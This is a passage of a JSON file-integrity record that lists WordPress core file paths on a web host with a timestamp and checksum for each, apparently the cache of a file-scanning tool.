"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-selective-refresh.php\":{\"d\":1474909659,\"h\":\"37130b6dae13888d900a6d86ad63ee84\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-name-control.php\":{\"d\":1474909659,\"h\":\"7be860d996d35f933754a894c8a50833\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-location-control.php\":{\"d\":1474909659,\"h\":\"21937ae7a6d44e486f3b1625b1a9eb3f\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-new-menu-control.php\":{\"d\":1474909659,\"h\":\"5b8bc62182f5b6415bac0d1d5a4cb4cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-header-image-control.php\":{\"d\":1474909659,\"h\":\"5d1bfb92fc2d0963bd528aa50637f881\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-cropped-image-control.php\":{\"d\":1474909659,\"h\":\"188e5b572722f166ecf649de99a99f74\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-partial.php\":{\"d\":1474909659,\"h\":\"258777a25990b9240cba91100ae1eb75\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-nav-menu-item-control.php\":{\"d\":1474909659,\"h\":\"4e278416b0f349b125a0ea8fa339a77d\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-media-control.php\":{\"d\":1474909659,\"h\":\"72d9749d6a2b497138ee8636e1f0909d\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/customize\\/class-wp-customize-color-control.php\":{\"d\":1474909659,\"h\":\"702e0f2feca78a4f936e426b9072748a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/sidebar.php\":{\"d\":1474909659,\"h\":\"8087f37304ad86ff1748b4446c9a2c0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/footer-embed.php\":{\"d\":1474909659,\"h\":\"16841cf55adc04ab84f22e932b96196a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/header-embed.php\":{\"d\":1474909659,\"h\":\"67962ba2c878829d26817766d258dcc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/footer.php\":{\"d\":1474909659,\"h\":\"8c5ff873dc3098a5e46ccbbf909c377e\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/comments.php\":{\"d\":1474909659,\"h\":\"1822ba9f62e4bf3d510a7e4306e67d4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/embed-content.php\":{\"d\":1474909659,\"h\":\"8d56b68c3883df89dc813b2eafa2901c\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/embed.php\":{\"d\":1474909659,\"h\":\"72b64c89bf45f2760c6133f7a3dd3649\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/embed-404.php\":{\"d\":1474909659,\"h\":\"8fab25000fafee699fb4e76871ed02f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/theme-compat\\/header.php\":{\"d\":1474909659,\"h\":\"304c40bba1dd25870a0bceffefc25024\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/rest-api\\/class-wp-rest-server.php\":{\"d\":1474909659,\"h\":\"64964c3b1a3880adbce85066522f2afe\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/rest-api\\/class-wp-rest-request.php\":{\"d\":1474909659,\"h\":\"e43dfc7c15b4f2845a17318870d0c357\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/rest-api\\/class-wp-rest-response.php\":{\"d\":1474909659,\"h\":\"08796d0cda636c6a24bcebbb73ef2c98\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/pomo\\/entry.php\":{\"d\":1474909659,\"h\":\"ed9d811ef0cb13bdc0fa60b8314c8d61\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/pomo\\/mo.php\":{\"d\":1474909659,\"h\":\"c5afce301f6c8344b9b88a2f695b7f9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/pomo\\/po.php\":{\"d\":1474909659,\"h\":\"0ad8053b19fc235615e1569b977c6fc6\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/pomo\\/streams.php\":{\"d\":1474909659,\"h\":\"beac73a17cc41d2d138d3c69f1967080\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/pomo\\/translations.php\":{\"d\":1474909659,\"h\":\"54f87e748e3a7bfcbb3ec83456861ecd\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Response\\/Headers.php\":{\"d\":1474909659,\"h\":\"1ad7c382d2b68f19412da7f43e63a960\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/400.php\":{\"d\":1474909659,\"h\":\"51e56e878cbb564ab852c978fb35fcd0\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/414.php\":{\"d\":1474909659,\"h\":\"bca65d55e2409ef6a5291ed8e6a12368\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/404.php\":{\"d\":1474909659,\"h\":\"1ed416cc6311835900857973f8923c4d\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/500.php\":{\"d\":1474909659,\"h\":\"c0afa9c66b6d830a094815f2124dffda\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/305.php\":{\"d\":1474909659,\"h\":\"58f8f700904bebe62f60a11c2cfbab26\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/416.php\":{\"d\":1474909659,\"h\":\"f931824e39e39617c9aac661804478f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/413.php\":{\"d\":1474909659,\"h\":\"e9963cc15dc99059b7d9ff584c17bfd8\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/511.php\":{\"d\":1474909659,\"h\":\"03756e9a4e3c4b77f8d09bb9918fd140\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/501.php\":{\"d\":1474909659,\"h\":\"650cdab83034f22d3fe803f5d791a835\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/503.php\":{\"d\":1474909659,\"h\":\"3906f7520861c39f43f46000d45554b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/304.php\":{\"d\":1474909659,\"h\":\"d33b4634ce4113db49ef9dddedf754ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/418.php\":{\"d\":1474909659,\"h\":\"4a21bae298f1c9feda5b0e93fe348af3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/407.php\":{\"d\":1474909659,\"h\":\"c2c817e9f5d8768bbde4d66a26e6c6b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/408.php\":{\"d\":1474909659,\"h\":\"403e3164844958c5144f98ecc8b77689\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/402.php\":{\"d\":1474909659,\"h\":\"60f859d55150da0b0a7a959ac9f347d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/429.php\":{\"d\":1474909659,\"h\":\"53f0dd257c04462ec3a05a6485b38fcc\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/412.php\":{\"d\":1474909659,\"h\":\"25b88449dcb7a1a83dd906378aa556c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/306.php\":{\"d\":1474909659,\"h\":\"57737a071fa1754e50db6adcc9f25875\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/Unknown.php\":{\"d\":1474909659,\"h\":\"da646c02e1ab81b632af41fbcf0a57ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/417.php\":{\"d\":1474909659,\"h\":\"4270026a1b8e684f5ec0635c47201c23\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/410.php\":{\"d\":1474909659,\"h\":\"71be4f3437dfbadda52f38582184e19b\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/431.php\":{\"d\":1474909659,\"h\":\"e0e3737c622417ca08d5d1933c1489d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/502.php\":{\"d\":1474909659,\"h\":\"7cc83a6c80cf7af9d5217b17fb47ff69\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/403.php\":{\"d\":1474909659,\"h\":\"bcd160e8f70dc76ffbbf6b33b7fe31df\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/405.php\":{\"d\":1474909659,\"h\":\"dd38d182de6d21b2d2ac18b381adf97f\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/415.php\":{\"d\":1474909659,\"h\":\"0258cc0fb05462ea8f11ccaea34a55c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/401.php\":{\"d\":1474909659,\"h\":\"3b2ab80eb9cbfd87baa23fc1648e9940\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/428.php\":{\"d\":1474909659,\"h\":\"9a97bb0369f70142e4e57da75eae742a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/411.php\":{\"d\":1474909659,\"h\":\"27a552a1e4160c4df61b2eca5a604796\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/409.php\":{\"d\":1474909659,\"h\":\"995a1dc469e67e2a3d0b8f9bebfea9b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/505.php\":{\"d\":1474909659,\"h\":\"8e5d4109053303e65b2f4364c1ac12de\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/406.php\":{\"d\":1474909659,\"h\":\"4bc8cb6cef688c729edc3990220006ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP\\/504.php\":{\"d\":1474909659,\"h\":\"02d76d8cccaa446293201112908a2aa5\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/Transport\\/cURL.php\":{\"d\":1474909659,\"h\":\"853654cd672a1a9b3a09af077837dfe1\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/Transport.php\":{\"d\":1474909659,\"h\":\"abbb6cf8da7ae8ea204a0118ab5ed101\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception\\/HTTP.php\":{\"d\":1474909659,\"h\":\"e8d5fc68b3c6fa15e4526c161172dae5\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Transport\\/cURL.php\":{\"d\":1474909659,\"h\":\"6c1affbfdcfd9081e4787a50be2b9415\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Transport\\/fsockopen.php\":{\"d\":1474909659,\"h\":\"0ce6b899e3e1f9a178a2803cd0d14db2\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Proxy\\/HTTP.php\":{\"d\":1474909659,\"h\":\"ffd0e62f32db05bdbda6bca407d7f029\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Auth\\/Basic.php\":{\"d\":1474909659,\"h\":\"67fdd878cc84df15093455d6096b2143\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Cookie\\/Jar.php\":{\"d\":1474909659,\"h\":\"e9300c5fb1f52670a0b52234d95c9510\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Utility\\/CaseInsensitiveDictionary.php\":{\"d\":1474909659,\"h\":\"b5f03ac8c752b34b9e726f04d548327a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Utility\\/FilteredIterator.php\":{\"d\":1474909659,\"h\":\"10f9a2d9618ed678b72541aa9e0579d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Cookie.php\":{\"d\":1474909659,\"h\":\"d19d43afe99bc52881322b927960a4d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/SSL.php\":{\"d\":1474909659,\"h\":\"265067eb274136ac28be300b37540c4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/IPv6.php\":{\"d\":1474909659,\"h\":\"a5df4b884e8a07e81703f1ac6b6e54b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Exception.php\":{\"d\":1474909659,\"h\":\"879bac9efa180085ab33e90e1acc5249\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/IRI.php\":{\"d\":1474909659,\"h\":\"4edb2b5fe4fcdfbcd685513bcec9fdfa\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Proxy.php\":{\"d\":1474909659,\"h\":\"b5406b1037b500d7d374b85c2a879947\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Transport.php\":{\"d\":1474909659,\"h\":\"019c993bce6bed178baf4b5c566cc617\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Hooker.php\":{\"d\":1474909659,\"h\":\"0f08c5401425a9615bd19e2f34a5e107\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Auth.php\":{\"d\":1474909659,\"h\":\"3197d2529dd957b2acc3944f5bfcd64a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/IDNAEncoder.php\":{\"d\":1474909659,\"h\":\"d77dada232f0079b1412e0d050b4d8b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Session.php\":{\"d\":1474909659,\"h\":\"37f8cadd86fcbfce9602b5bcf67d6c8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Hooks.php\":{\"d\":1474909659,\"h\":\"2c15a0a520b9a8976778a169ceebd919\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/Requests\\/Response.php\":{\"d\":1474909659,\"h\":\"11ce7086bbb7ae52e6abb7c4fd270b47\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/HTTP\\/Parser.php\":{\"d\":1474909659,\"h\":\"5725c7d0fb347f1c08df3690a58f3609\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Decode\\/HTML\\/Entities.php\":{\"d\":1474909659,\"h\":\"45975e2fcf0d428691a55a2394252f61\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Parse\\/Date.php\":{\"d\":1474909659,\"h\":\"ee82d2e70dc8afc6b96510d2b9cff45e\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/XML\\/Declaration\\/Parser.php\":{\"d\":1474909659,\"h\":\"8fb1da7028c385bb9d4203c9f6732362\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Net\\/IPv6.php\":{\"d\":1474909659,\"h\":\"a546790e216abdd9801795949fb6b40f\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Content\\/Type\\/Sniffer.php\":{\"d\":1474909659,\"h\":\"7c72c3f369855562d96c77ece1c7db33\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Cache\\/Base.php\":{\"d\":1474909659,\"h\":\"9443eda189bbd9325d0c9c045d237c6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Cache\\/MySQL.php\":{\"d\":1474909659,\"h\":\"e8911ece15df42ca43991a48d5785687\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Cache\\/File.php\":{\"d\":1474909659,\"h\":\"a33dbb0540ecc29cc6425b14100953d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Cache\\/Memcache.php\":{\"d\":1474909659,\"h\":\"f69d4a55b2a1168531535107ab843fb6\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Cache\\/DB.php\":{\"d\":1474909659,\"h\":\"0659bf084f55a303f5922edc62bcfbf6\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Author.php\":{\"d\":1474909659,\"h\":\"348071ed105ff0418b25964e771ba331\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Credit.php\":{\"d\":1474909659,\"h\":\"0385e4a14de78c8b2a167f3e0aea197c\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Exception.php\":{\"d\":1474909659,\"h\":\"094bfd76269c9fcc3c5cda8f05d05335\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Source.php\":{\"d\":1474909659,\"h\":\"8e83bb1de3e018f0537bb32a8c9617ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/IRI.php\":{\"d\":1474909659,\"h\":\"6e16ff20d3e68692cf3b617b875f36f5\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/gzdecode.php\":{\"d\":1474909659,\"h\":\"c538e2bc0e866197db616c17841134d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Enclosure.php\":{\"d\":1474909659,\"h\":\"122e861f42eb6e01ce8d4b0f11fb735d\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Misc.php\":{\"d\":1474909659,\"h\":\"cecde679c62dd50207d8d25ece1a4b89\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/File.php\":{\"d\":1474909659,\"h\":\"aeba08ad6b558736ea0aaf2beb2925b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Core.php\":{\"d\":1474909659,\"h\":\"a4ae19a923b890f2dcf7e2d415fd1ad2\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Category.php\":{\"d\":1474909659,\"h\":\"ba7ec8cc3f13d4f27f2e0adcaf64bb2a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Sanitize.php\":{\"d\":1474909659,\"h\":\"42d8b8c0cf46b5d8a511e0ae48b88f75\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Item.php\":{\"d\":1474909659,\"h\":\"104510e221fa08437aec008e633cdca7\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Rating.php\":{\"d\":1474909659,\"h\":\"3d7013a46d09c74b0ee3d8af617412fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Locator.php\":{\"d\":1474909659,\"h\":\"8073a4c6da1bb33b877576665ef5eab5\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Registry.php\":{\"d\":1474909659,\"h\":\"1cc8a2e6c0b5dd3176398d6400f0d9b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Caption.php\":{\"d\":1474909659,\"h\":\"bdbabcdcca426a4dadf6675bc4c4ebe9\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Copyright.php\":{\"d\":1474909659,\"h\":\"bd7fbf68b954a9d50955cc808db7cb6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Cache.php\":{\"d\":1474909659,\"h\":\"79fc9017a23a836f4d0f68f7764ca734\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Restriction.php\":{\"d\":1474909659,\"h\":\"2a191e7168116418817388113bd57914\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/SimplePie\\/Parser.php\":{\"d\":1474909659,\"h\":\"52bb2ee462e7e414a77efdc7ebf52bcc\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/images\\/crystal\\/license.txt\":{\"d\":1474909659,\"h\":\"f05db54c63e36918479b6651930dcfe7\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.tag.id3v2.php\":{\"d\":1474909659,\"h\":\"f26306a3858ad4074679d94f2aeead4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio-video.matroska.php\":{\"d\":1474909659,\"h\":\"639aa5ae894b396a00fb53fc8069e74a\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/readme.txt\":{\"d\":1474909659,\"h\":\"9396dfe1c69c938eb17f564c4e5bab18\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio-video.quicktime.php\":{\"d\":1474909659,\"h\":\"272dfd6e4c391f20611a11d921e66eeb\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio.mp3.php\":{\"d\":1474909659,\"h\":\"eb87257b2f0507f4ac5591d4226dfc86\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio-video.asf.php\":{\"d\":1474909659,\"h\":\"286b1999c151b7ba01cfd57c24e134cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.tag.id3v1.php\":{\"d\":1474909659,\"h\":\"2b368be9e19051d00cac0e67341d051d\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/license.txt\":{\"d\":1474909659,\"h\":\"35d98aadf8f7cc6851336651f7a66b98\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio-video.flv.php\":{\"d\":1474909659,\"h\":\"6b834869b62c57fea91851b146dce3d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio.ac3.php\":{\"d\":1474909659,\"h\":\"e81c4500fb4c3b224fd2f9a78ba66427\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.tag.apetag.php\":{\"d\":1474909659,\"h\":\"346c8c1b97caecba5592a91452fa3949\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.tag.lyrics3.php\":{\"d\":1474909659,\"h\":\"1255f9fb3380ba93dd223981b21832ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/license.commercial.txt\":{\"d\":1474909659,\"h\":\"0a3b670896fc4a8067adb2c6d978418e\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/getid3.lib.php\":{\"d\":1474909659,\"h\":\"c52de7647222fe4b24e2ea04755f99b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio.dts.php\":{\"d\":1474909659,\"h\":\"f3ea566007c94c03372eb6f46c5d2001\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio.flac.php\":{\"d\":1474909659,\"h\":\"055003ea7c0388fd73107113d3ed3bc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio-video.riff.php\":{\"d\":1474909659,\"h\":\"ee82540f026662197f7003474fd92de2\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/module.audio.ogg.php\":{\"d\":1474909659,\"h\":\"7bdc813a7fa95feceed4f6d4b37d3c97\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/ID3\\/getid3.php\":{\"d\":1474909659,\"h\":\"97bcd61856df7afa653d491775efda5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/jquery-ui-dialog.min.css\":{\"d\":1474909659,\"h\":\"dae18845cfc3c211c5c6de92401b2ad5\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/editor.min.css\":{\"d\":1474909659,\"h\":\"eeae1118610e5531c31ba2bcb9307e53\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/dashicons.min.css\":{\"d\":1474909659,\"h\":\"cf3c0e8f26fe2025a0f22138ffe30d53\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/admin-bar.min.css\":{\"d\":1474909659,\"h\":\"3a4f06342b20831610cd2389936d60cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/buttons-rtl.css\":{\"d\":1474909659,\"h\":\"18cac60d5d31e37c3070817504c62af3\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/media-views.min.css\":{\"d\":1474909659,\"h\":\"2a1ab38629d6f10178a0d200e7edaad1\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/media-views-rtl.css\":{\"d\":1474909659,\"h\":\"0f5b4dc649f5d2218067a8c37e7c1bab\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/jquery-ui-dialog-rtl.css\":{\"d\":1474909659,\"h\":\"10939ff6a3629fba80e30e2e7c526901\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/buttons-rtl.min.css\":{\"d\":1474909659,\"h\":\"04203d21bcc20f3c309146e22db92332\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/wp-embed-template.css\":{\"d\":1474909659,\"h\":\"58d51bdeef6c8132410f1a7af5be8eec\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/customize-preview.css\":{\"d\":1474909659,\"h\":\"0ab30f10403b04fae67be3820704c05f\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/wp-auth-check.min.css\":{\"d\":1474909659,\"h\":\"d1f94f9a93f83b7dc4d924f04842d294\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/admin-bar-rtl.min.css\":{\"d\":1474909659,\"h\":\"9b64d09bbbe5b190fcd535d858fb353f\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/dashicons.css\":{\"d\":1474909659,\"h\":\"cbd78303f0ab99bcf4470575b0f8a7ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/editor.css\":{\"d\":1474909659,\"h\":\"2bb48c16cf49b06d70fea86fe99edfff\"},\"\\/home2\\/zphiblgz\\/public_html\\/Development\\/wp-includes\\/css\\/media-views-rtl.min.css\":{\"d\":1474909659,\